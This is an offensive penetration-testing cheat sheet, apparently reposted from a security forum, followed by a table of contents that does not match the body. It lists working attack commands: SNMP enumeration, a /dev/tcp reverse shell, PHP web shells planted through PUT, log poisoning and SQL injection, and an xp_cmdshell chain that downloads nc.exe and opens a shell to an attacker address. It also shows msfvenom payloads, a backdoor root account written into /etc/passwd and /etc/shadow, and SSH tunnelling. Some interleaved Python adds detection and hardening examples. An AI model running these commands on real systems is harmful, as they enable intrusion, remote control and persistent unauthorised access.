# Windows User Accounts
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.25
# Windows Running Programs
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.4.2.1.2
# Windows Hostname
snmpwalk -c public -v1 $TARGET .1.3.6.1.2.1.1.5
# Windows Share Information
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.3.1.1
# Windows Share Information
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.27
# Windows TCP Ports
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.6.13.1.3
# Software Name
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.6.3.1.2
# brute-force community strings
onesixtyone -i snmp-ips.txt -c community.txt
snmp-check $TARGET
r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();
XTerm
xterm -display 10.0.0.1:1
JDWP RCE
print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("whoami").getInputStream())).readLine())
Working with Restricted Shells
nice /bin/bash
Interactive TTY Shells
/usr/bin/expect sh
python -c 'import pty; pty.spawn("/bin/sh")'
# execute one command with su as another user if you do not have access to the shell. Credit to g0blin.co.uk
python3 -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,b"fruity\n");time.sleep(0.1);print(os.read(master,1024))'
File upload via HTML form
# POST file
curl -X POST -F "file=@/file/location/shell.php" http://$TARGET/upload.php --cookie "cookie"
# POST binary data to web form
curl -F "field=<shell.zip" http://$TARGET/upld.php -F 'k=v' --cookie "k=v;" -F "submit=true" -L -v
PUT method
curl -X PUT -d '<?php system($_GET["c"]);?>' http://192.168.2.99/shell.php
# Bruteforce based on the pattern;
hashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout
# Generate password candidates: wordlist (or a file holding one base word) + pattern; to crack instead of printing, drop --stdout and put the hash (e.g. "e99a18c428cb38d5f260853678922e03") before the wordlist;
hashcat -a6 -m0 --stdout /usr/share/wordlists/rockyou.txt ?d?d?d?u?u?u --force --potfile-disable
Generating payloads with msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.245 LPORT=443 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
Compiling Code From Linux
# Windows
i686-w64-mingw32-gcc source.c -lws2_32 -o out.exe
# Linux
gcc -m32 -o output source.c   # or -m64 for a 64-bit target
Local file inclusion to shell
nc 192.168.1.102 80
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: 192.168.1.102
Connection: close
# Then send as cmd payload via http://192.168.1.102/index.php?page=../../../../../var/log/apache2/access.log&cmd=id
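As an added detection-side example (not part of the original cheat sheet): the log-poisoning chain above leaves two traces in the web server's own access log, a request whose path carries a PHP tag (written into the log verbatim) and a later request that includes that log file through the page parameter. The Python below scans constructed Apache combined-format lines for both patterns plus plain traversal; the sample lines, client IPs and rule names are invented for this example.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines (not from a real server): a benign
# request, the poisoning write (PHP tag in the request path, logged verbatim)
# and the include of the log file through the vulnerable page parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2024:10:00:03 +0000] "GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1" 404 196 "-" "-"
10.0.0.9 - - [10/Jan/2024:10:00:07 +0000] "GET /index.php?page=../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 8123 "-" "curl/7.88"
"""

# Request line inside the log entry: method, target (may contain spaces when
# the client sent a malformed path, as in the poisoning request), protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.*?) (?P<proto>HTTP/[\d.]+)"')

# Rule name -> pattern applied to the decoded request target, in this order.
RULES = [
    ("path-traversal", re.compile(r"\.\./|\.\.\\")),
    ("log-file-include", re.compile(r"/var/log/|/proc/self/(environ|fd/)", re.IGNORECASE)),
    ("php-tag-in-request", re.compile(r"<\?(php|=)", re.IGNORECASE)),
]

def classify(line):
    """Return the names of the rules this log line matches (empty list if none)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # Decode twice so double-encoded traversal (%252e%252e) is caught as well.
    target = unquote(unquote(m.group("target")))
    return [name for name, rx in RULES if rx.search(target)]

def scan(log_text):
    """Return [(client_ip, [rule, ...])] for every line that matched at least one rule."""
    hits = []
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            hits.append((line.split(" ", 1)[0], findings))
    return hits

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, ", ".join(findings))
```

A PHP tag in a request target is worth alerting on even when the response was a 404, because the log entry itself is the payload; the include request arrives later, often from the same client.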
cmd /c dir closes the command window after dir finishes.
cmd /k dir keeps the command window open after dir finishes.
cmd /c start dir opens a new window and runs dir there; the original window closes.
cmd /k start dir opens a new window and runs dir there; the original window stays open.
Making good use of SQL injection
# Assumed 3 columns
http://target/index.php?vulnParam=0' UNION ALL SELECT 1,"<?php system($_REQUEST['cmd']);?>",2,3 INTO OUTFILE "c:/evil.php"-- uMj
# sqlmap; post-request - captured request via Burp Proxy via Save Item to File.
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
xp_cmdshell
# netcat reverse shell via mssql injection when xp_cmdshell is available
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
SQLite
ATTACH DATABASE '/home/www/public_html/uploads/phpinfo.php' as pwn;
CREATE TABLE pwn.shell (code TEXT);
INSERT INTO pwn.shell (code) VALUES ('<?php system($_REQUEST["cmd"]);?>');
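An added example, not from the original page, showing why the ATTACH trick works and what stops it: a small lookup function is written once with string-built SQL run through sqlite3's executescript() (which executes stacked statements) and once with a bound parameter. The table, column, payload and temporary file path are constructed for the demonstration, and the payload creates an empty SQLite file rather than the PHP file above, so the mechanism is the same but harmless.

```python
import os
import sqlite3
import tempfile

# Constructed demo: table, column and payload are invented for this example.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO items VALUES (1, 'widget')")
    conn.commit()
    return conn

def lookup_unsafe(conn, user_input):
    # String-built SQL passed to executescript(): every ';'-separated statement the
    # input smuggles in (ATTACH, CREATE TABLE, ...) runs with the application's
    # file-system rights. executescript() discards SELECT results, which is itself
    # a hint that it is the wrong API for a lookup.
    conn.executescript(f"SELECT name FROM items WHERE name = '{user_input}';")

def lookup_safe(conn, user_input):
    # Bound parameter: the input is compared as a value and never parsed as SQL.
    # execute() additionally refuses more than one statement per call.
    return conn.execute("SELECT name FROM items WHERE name = ?", (user_input,)).fetchall()

def attach_payload(path):
    # Same shape as the ATTACH/CREATE TABLE chain above; the trailing '--' comments
    # out the closing quote and ';' that the application's template appends.
    return f"x'; ATTACH DATABASE '{path}' AS pwn; CREATE TABLE pwn.t (c TEXT); --"

def demo():
    """Run both variants against the payload.
    Returns (file_created_by_unsafe, rows_from_safe, file_created_by_safe)."""
    with tempfile.TemporaryDirectory() as tmp:
        target_unsafe = os.path.join(tmp, "dropped.db")  # stands in for a web-root path
        conn = make_db()
        lookup_unsafe(conn, attach_payload(target_unsafe))
        unsafe_wrote = os.path.exists(target_unsafe)
        conn.close()

        target_safe = os.path.join(tmp, "untouched.db")
        conn = make_db()
        rows = lookup_safe(conn, attach_payload(target_safe))
        safe_wrote = os.path.exists(target_safe)
        conn.close()
    return unsafe_wrote, rows, safe_wrote

if __name__ == "__main__":
    print(demo())
```

The second defence the demo does not show is running the database user without write access to the web root, so that even a successful ATTACH cannot land a file where the web server will execute it.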
# TFTP Linux: cat /etc/default/atftpd to find out file serving location; default in kali /srv/tftp
service atftpd start
# Windows
tftp -i $ATTACKER get /download/location/file /save/location/file
FTP
# Linux: set up ftp server with anonymous logon access;
twistd -n ftp -p 21 -r /file/to/serve
# Windows shell: read FTP commands from ftp-commands.txt non-interactively;
echo open $ATTACKER>ftp-commands.txt
echo anonymous>>ftp-commands.txt
echo whatever>>ftp-commands.txt
echo binary>>ftp-commands.txt
echo get file.exe>>ftp-commands.txt
echo bye>>ftp-commands.txt
ftp -s:ftp-commands.txt
# Or just a one-liner
(echo open 10.11.0.245&echo anonymous&echo whatever&echo binary&echo get nc.exe&echo bye) > ftp.txt & ftp -s:ftp.txt & nc.exe 10.11.0.245 443 -e cmd
# 1. In Linux, convert binary to hex ascii:
wine /usr/share/windows-binaries/exe2bat.exe /root/tools/netcat/nc.exe nc.txt
# 2. Paste nc.txt into Windows Shell.
# Listen on local port 8080 and forward incoming traffic to REMOT_HOST:PORT via SSH_SERVER
# Scenario: access a host that's being blocked by a firewall via SSH_SERVER;
ssh -L 127.0.0.1:8080:REMOTE_HOST:PORT user@SSH_SERVER
SSH Dynamic Port Forwarding
# Listen on local port 8080. Incoming traffic to 127.0.0.1:8080 forwards it to final destination via SSH_SERVER
# Scenario: proxy your web traffic through SSH tunnel OR access hosts on internal network via a compromised DMZ box;
ssh -D 127.0.0.1:8080 user@SSH_SERVER
SSH Remote Port Forwarding
# Open port 5555 on SSH_SERVER. Incoming traffic to SSH_SERVER:5555 is tunneled to LOCALHOST:3389
# Scenario: expose RDP on non-routable network;
ssh -R 5555:LOCAL_HOST:3389 user@SSH_SERVER
plink -R ATTACKER:ATTACKER_PORT:127.0.0.1:80 -l root -pw pw ATTACKER_IP
Proxy tunnel
# Open a local port 127.0.0.1:5555. Incoming traffic to 5555 is proxied to DESTINATION_HOST through PROXY_HOST:3128
# Scenario: a remote host has SSH running, but it's only bound to 127.0.0.1, and you want to reach it;
proxytunnel -p PROXY_HOST:3128 -d DESTINATION_HOST:22 -a 5555
ssh user@127.0.0.1 -p 5555
HTTP tunnel
# Server - open port 80. Redirect all incoming traffic to localhost:80 to localhost:22
hts -F localhost:22 80
# Client - open port 8080. Redirect all incoming traffic to localhost:8080 to 192.168.1.15:80
htc -F 8080 192.168.1.15:80
# Client - connect to localhost:8080 -> get tunneled to 192.168.1.15:80 -> get redirected to 192.168.1.15:22
ssh localhost -p 8080
# Query the local db for a quick file find. Run updatedb before executing locate.
locate passwd
# Show which file would be executed in the current environment, depending on $PATH environment variable;
which nc wget curl php perl python netcat tftp telnet ftp
# Search for *.conf (case-insensitive) files recursively starting with /etc;
find /etc -iname '*.conf'
echo 'spotless::0:0:root:/root:/bin/bash' >> /etc/passwd
# Rarely needed, but use this if you need to set a password for the user created above and useradd/passwd are not working. Pwd is "kali"
sed 's/!/\$6$o1\.HFMVM$a3hY6OPT\/DiQYy4koI6Z3\/sLiltsOcFoS5yCKhBBqQLH5K1QlHKL8\/6wJI6uF\/Q7mniOdq92v6yjzlVlXlxkT\./' /etc/shadow > /etc/s2; cat /etc/s2 > /etc/shadow; rm /etc/s2
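The two lines above create a second UID-0 account and then give it a usable hash. As an added example (not from the page), the following Python audits constructed /etc/passwd and /etc/shadow contents for exactly those conditions: extra UID-0 entries, empty password fields, a hash stored in passwd itself, and whether the corresponding shadow hash is usable or locked. Account names and hash strings in the samples are made up.

```python
# Constructed sample contents (not from a real host). 'spotless' is the kind of
# entry the echo >> /etc/passwd line above creates: UID 0, empty password field,
# no shadow entry. 'backup' is what the sed step produces: a second UID-0
# account whose shadow field holds a real hash. Hash strings are fake.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
spotless::0:0:root:/root:/bin/bash
backup:x:0:0:backup:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

SAMPLE_SHADOW = """\
root:$6$saltsalt$FAKEHASHFAKEHASHFAKEHASH:19700:0:99999:7:::
alice:$6$saltsalt$FAKEHASHFAKEHASHFAKEHASH:19700:0:99999:7:::
backup:$6$saltsalt$FAKEHASHFAKEHASHFAKEHASH:19700:0:99999:7:::
www-data:*:19700:0:99999:7:::
"""

def hash_is_usable(h):
    """True if a shadow hash field permits password login: not empty and not locked ('!' or '*')."""
    return h != "" and not h.startswith("!") and not h.startswith("*")

def parse_shadow(text):
    """Map user -> hash field from /etc/shadow contents."""
    shadow = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            shadow[fields[0]] = fields[1]
    return shadow

def audit(passwd_text, shadow_text):
    """Return [(user, finding)] for suspicious entries in /etc/passwd, in file order."""
    shadow = parse_shadow(shadow_text)
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed-entry"))
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and user != "root":
            h = shadow.get(user)
            if h is None:
                state = "no-shadow-entry"
            elif hash_is_usable(h):
                state = "usable-hash"
            else:
                state = "locked"
            findings.append((user, "extra-uid0-account:" + state))
        if pw == "":
            # Empty field in passwd itself: the account has no password set at all.
            findings.append((user, "empty-password-field"))
        elif pw != "x" and hash_is_usable(pw):
            # A hash living in world-readable /etc/passwd instead of /etc/shadow.
            findings.append((user, "hash-stored-in-passwd"))
    return findings

if __name__ == "__main__":
    for user, finding in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{user}: {finding}")
```

On a live host the same function can be fed the real files; a cron job diffing its output against a known-good baseline catches both the passwd append and the shadow rewrite shown above.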
Reposted from 先知社区
Reconnaissance
Extract live IPs from nmap output
Simple port scan
DNS lookups, Zone Transfers & Brute-Force
Banner grabbing
NFS shares
List the NFS exported shares; if RW and no_root_squash are present, upload a Sid-Shell directly and execute it.
Kerberos User Enumeration
HTTP Brute-Force & Vulnerability Scanning
RPC/NetBios/SMB
SNMP
SMTP
Active Directory
One note: those information-gathering tools are all built on the built-in functions, PowerView being the classic one; being familiar with them also helps when developing your own tools.
Current domain information
PowerShell command auto-completion is very handy here, because some field names are very long.
![](https://camo.githubusercontent.com/b72f4c65c72f575b62b7878cdbe7f2f088ccc6274fbeb07422c94a894e35f78d/68747470733a2f2f787a66696c652e616c6979756e63732e636f6d2f6d656469612f75706c6f61642f706963747572652f32303139303333303039343734332d63663266363838322d353238642d312e706e67)
Domain trusts
Current forest information
Forest trust information
All DCs of a domain
Get the DC's current authentication information
Get trusted domain information from cmd
Get user information
Get the currently authenticated DC
Get user information
Gaining access
A refresher on reverse shells
Bash
Perl
URL-Encoded Perl: Linux
Python
php
Ruby
Netcat without -e #1
Netcat without -e #2
Java
XTerm
JDWP RCE
Working with Restricted Shells
Interactive TTY Shells
File upload via HTML form
PUT method
Payload pattern generation and offsets
Bypassing File Upload
Injecting code into images
.htaccess
Tips: Cracking Passwords
Crack Web
Crack Others
HashCat Cracking
Generating payloads with msfvenom
Compiling Code From Linux
Local file inclusion to shell
Local file inclusion to arbitrary file read
It got broken from playing around; it's just a cheat sheet anyway.
Windows + PHP
ps:
Making good use of SQL injection
xp_cmdshell
SQLite
MS-SQL Console
Non-interactive shell
Python code execution
Local Enumeration & Privilege Escalation
ImmunityDebugger
Get Loaded Modules
JMP ESP address
Cracking zip passwords
Simple HTTP server
MySQL privilege escalation
Requires
The link is dead; I'll contact the author to fix it.
Docker privilege escalation
Reset the root user's password
Uploading files to the target
TFTP
FTP
CertUtil
PHP
Python
HTTP: Powershell
HTTP: VBScript
HTTP: Linux
Netcat
HTTP: Windows "debug.exe" Method
HTTP: Windows BitsAdmin
HTTP: Windows BitsAdmin
Whois Data Exfiltration
Cancel data exfiltration
rlogin data exfiltration
Ping a specified range
Brute-forcing XOR
Generating bad characters
.py -> .exe
Netcat Portscan
Attacking Windows services
Find file/folder permissions explicitly set for a given user
AlwaysInstallElevated MSI
Metasploit PowerShell AlwaysInstallElevated privilege escalation in practice
Windows credentials
Unquoted service paths
Service backdoors
Port Forwarding / SSH Tunneling
SSH: Local Port Forwarding
SSH Dynamic Port Forwarding
SSH Remote Port Forwarding
Proxy tunnel
HTTP tunnel
Netsh forwarding
RunAs
powershell
CMD
PsExec
Pth-WinExe
Finding hidden files
Common file search operations
Post-exploitation
Registry hives
hivexsh - Windows registry hive shell
Decrypting VNC passwords
Create a user and add it to the administrators group
Wingtips: when there is no output, a failed add may be because your password does not meet the password policy.
SSH keys
Creating Backdoor
Create another root user
OpenSSL Password
Scheduled tasks
Original link